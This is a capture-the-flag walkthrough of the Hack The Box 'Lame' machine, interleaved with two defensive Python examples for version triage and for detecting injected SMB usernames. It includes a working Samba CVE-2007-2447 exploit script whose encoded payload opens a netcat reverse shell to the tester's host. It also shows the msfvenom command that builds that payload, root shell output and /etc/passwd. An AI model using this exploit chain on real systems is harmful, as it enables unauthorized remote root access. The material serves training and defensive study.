Lame

Introduction:
This is an extremely simple machine based on a very old CVE (CVE-2007-2447) in the SMB service. The exploit for this vulnerability is readily available at https://www.exploit-db.com/exploits/16320/.
You can do this machine with the Metasploit module, but since OffSec discourages its use in OSCP, it's better to do it manually by modifying the exploit yourself.
Recon
# nmap -sS -sV -sC -T4 -oN nmap.lame.txt 10.10.10.3
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-12 09:29 EST
Nmap scan report for 10.10.10.3
Host is up (0.019s latency).
Not shown: 996 filtered ports
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 10.10.14.25
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 2h38m17s, deviation: 3h32m09s, median: 8m16s
| smb-os-discovery:
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name:
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2020-12-12T09:38:25-05:00
| smb-security-mode:
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 56.87 seconds
Enumeration
root@kinetic:/oscp/LABs/zerotrust/content/lab/hackthebox/lame/data# smbmap -H 10.10.10.3
[+] IP: 10.10.10.3:445 Name: 10.10.10.3
    Disk      Permissions    Comment
    ----      -----------    -------
    print$    NO ACCESS      Printer Drivers
    tmp       READ, WRITE    oh noes!
    opt       NO ACCESS
    IPC$      NO ACCESS      IPC Service (lame server (Samba 3.0.20-Debian))
    ADMIN$    NO ACCESS      IPC Service (lame server (Samba 3.0.20-Debian))
root@kinetic:/oscp/LABs/zerotrust/content/lab/hackthebox/lame/data# smbclient //10.10.10.3/tmp -u guest
protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED
root@kinetic:/oscp/LABs/zerotrust/content/lab/hackthebox/lame/data# smbclient -L //10.10.10.3/ --option='client min protocol=NT1'
Enter WORKGROUP\root's password:
Anonymous login successful

    Sharename    Type    Comment
    ---------    ----    -------
    print$       Disk    Printer Drivers
    tmp          Disk    oh noes!
    opt          Disk
    IPC$         IPC     IPC Service (lame server (Samba 3.0.20-Debian))
    ADMIN$       IPC     IPC Service (lame server (Samba 3.0.20-Debian))

Look up the SMB vulnerability based on the service name and version.
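
An added example (not from the original write-up) that automates this lookup for asset triage: it parses Samba banners from Nmap service lines and checks them against the CVE-2007-2447 affected range of 3.0.0 through 3.0.25rc3. The function names are hypothetical, the sample lines are taken from the scan above, and a banner version is only a hint because distributions backport fixes.

```python
import re

# Nmap service line carrying a Samba banner, e.g.
# "445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)"
BANNER = re.compile(r"^(\d+)/tcp\s+open\s+\S+\s+Samba smbd (\S+)")
VERSION = re.compile(r"^(\d+)\.(\d+)\.(\d+)(rc\d+|pre\d+)?")


def classify(version):
    """Return 'affected', 'not-affected' or 'unknown' for CVE-2007-2447."""
    m = VERSION.match(version)
    if not m:  # generic banners such as "3.X" carry no usable version
        return "unknown"
    major, minor, patch = (int(g) for g in m.group(1, 2, 3))
    prerelease = m.group(4) is not None
    if (major, minor) != (3, 0):
        return "not-affected"
    # Affected range ends at 3.0.25rc3, so 3.0.25 pre-releases still count.
    if patch < 25 or (patch == 25 and prerelease):
        return "affected"
    return "not-affected"


def triage_banners(nmap_text):
    """Map port -> (banner version, verdict) for every Samba service line."""
    results = {}
    for line in nmap_text.splitlines():
        m = BANNER.match(line.strip())
        if m:
            results[int(m.group(1))] = (m.group(2), classify(m.group(2)))
    return results


# Service lines from the scan shown on this page.
SAMPLE_SCAN = """\
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
"""

if __name__ == "__main__":
    for port, (version, verdict) in sorted(triage_banners(SAMPLE_SCAN).items()):
        print(f"{port}/tcp Samba {version}: {verdict}")
```

An "unknown" verdict means the banner was too generic to decide, so the host still needs a package-level check.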

After some Google searches you will find scripts similar to the one below -
source: https://gist.github.com/joenorton8014/19aaa00e0088738fc429cff2669b9851
You will have to modify the payload based on your IP and port configuration.
#!/usr/bin/python

from smb.SMBConnection import SMBConnection
import random, string
from smb import smb_structs
smb_structs.SUPPORT_SMB2 = False
import sys


# Just a python version of a very simple Samba exploit.
# It doesn't have to be pretty because the shellcode is executed
# in the username field.

# Based off this Metasploit module - https://www.exploit-db.com/exploits/16320/

# Configured SMB connection options with info from here:
# https://pythonhosted.org/pysmb/api/smb_SMBConnection.html

# Use the commandline argument as the target:
if len(sys.argv) < 2:
    print "\nUsage: " + sys.argv[0] + " <HOST>\n"
    sys.exit()


# Shellcode:
# msfvenom -p cmd/unix/reverse_netcat LHOST=10.0.0.35 LPORT=9999 -f python

buf = b""
buf += b"\x6d\x6b\x66\x69\x66\x6f\x20\x2f\x74\x6d\x70\x2f\x63"
buf += b"\x61\x69\x69\x78\x6f\x61\x3b\x20\x6e\x63\x20\x31\x30"
buf += b"\x2e\x31\x30\x2e\x31\x34\x2e\x32\x35\x20\x39\x39\x39"
buf += b"\x39\x20\x30\x3c\x2f\x74\x6d\x70\x2f\x63\x61\x69\x69"
buf += b"\x78\x6f\x61\x20\x7c\x20\x2f\x62\x69\x6e\x2f\x73\x68"
buf += b"\x20\x3e\x2f\x74\x6d\x70\x2f\x63\x61\x69\x69\x78\x6f"
buf += b"\x61\x20\x32\x3e\x26\x31\x3b\x20\x72\x6d\x20\x2f\x74"
buf += b"\x6d\x70\x2f\x63\x61\x69\x69\x78\x6f\x61"

username = "/=`nohup " + buf + "`"
password = ""
conn = SMBConnection(username, password, "SOMEBODYHACKINGYOU" , "METASPLOITABLE", use_ntlm_v2 = False)
assert conn.connect(sys.argv[1], 445)

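Because the script above delivers its command inside the SMB username, a defender can flag session-setup usernames that contain shell syntax. The following is an added example, not part of the original write-up or the referenced gist; the (source IP, username) record format and the function names are assumptions, and the sample records are constructed.

```python
import re

# Sequences that /bin/sh treats as command syntax. A lone trailing "$" is
# deliberately not listed: machine accounts such as "WS01$" are legitimate,
# as are "\" in DOMAIN\user and "@" in user@realm.
SHELL_META = re.compile(r"`|\$\(|\$\{|[;|&<>\n\r]")


def shell_metachars(username):
    """Return the distinct shell metacharacter sequences found in username."""
    return sorted(set(SHELL_META.findall(username)))


def triage_usernames(records):
    """records: iterable of (source_ip, username) pairs from SMB session setup.

    Returns (source_ip, username, hits) for every username carrying shell
    syntax, which no legitimate SMB account name needs.
    """
    alerts = []
    for src, user in records:
        hits = shell_metachars(user)
        if hits:
            alerts.append((src, user, hits))
    return alerts


# Constructed sample records (not real log output). The fourth entry mirrors
# the "/=`nohup ...`" username shape used by the script on this page, with a
# harmless placeholder command.
SAMPLE_RECORDS = [
    ("192.0.2.10", "WORKGROUP\\alice"),
    ("192.0.2.11", "WS01$"),
    ("192.0.2.12", "bob@example.test"),
    ("198.51.100.7", "/=`nohup id`"),
    ("198.51.100.8", "guest;uname -a"),
]

if __name__ == "__main__":
    for src, user, hits in triage_usernames(SAMPLE_RECORDS):
        print(f"ALERT src={src} username={user!r} metachars={hits}")
```
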
Shellcode was generated using -
$ msfvenom -p cmd/unix/reverse_netcat LHOST=10.10.14.25 LPORT=9999 -f python
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 101 bytes
Final size of python file: 503 bytes
Catch the shell by starting a netcat listener in a separate terminal window before you run the exploit.

$ nc -lvnp 9999
listening on [any] 9999 ...
connect to [10.10.14.25] from (UNKNOWN) [10.10.10.3] 40781
whoami
root
cd /root
ls
Desktop
reset_logs.sh
root.txt
vnc.log
cat root.txt
45XXXXXXXXXXXXXXXXXX26864
You should now be root!
Check /etc/passwd to find the other system users and you will find a user called makis. The user flag is in that user's home directory, as shown below -
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
bind:x:105:113::/var/cache/bind:/bin/false
postfix:x:106:115::/var/spool/postfix:/bin/false
ftp:x:107:65534::/home/ftp:/bin/false
postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false
tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false
distccd:x:111:65534::/:/bin/false
service:x:1002:1002:,,,:/home/service:/bin/bash
telnetd:x:112:120::/nonexistent:/bin/false
proftpd:x:113:65534::/var/run/proftpd:/bin/false
statd:x:114:65534::/var/lib/nfs:/bin/false
snmp:x:115:65534::/var/lib/snmp:/bin/false
makis:x:1003:1003::/home/makis:/bin/sh

cd /home/makis
ls
user.txt
cat us
cat: us: No such file or directory
cat user.txt
562XXXXXXXXXXXXXXXXXXXXXXXXXXXXe2a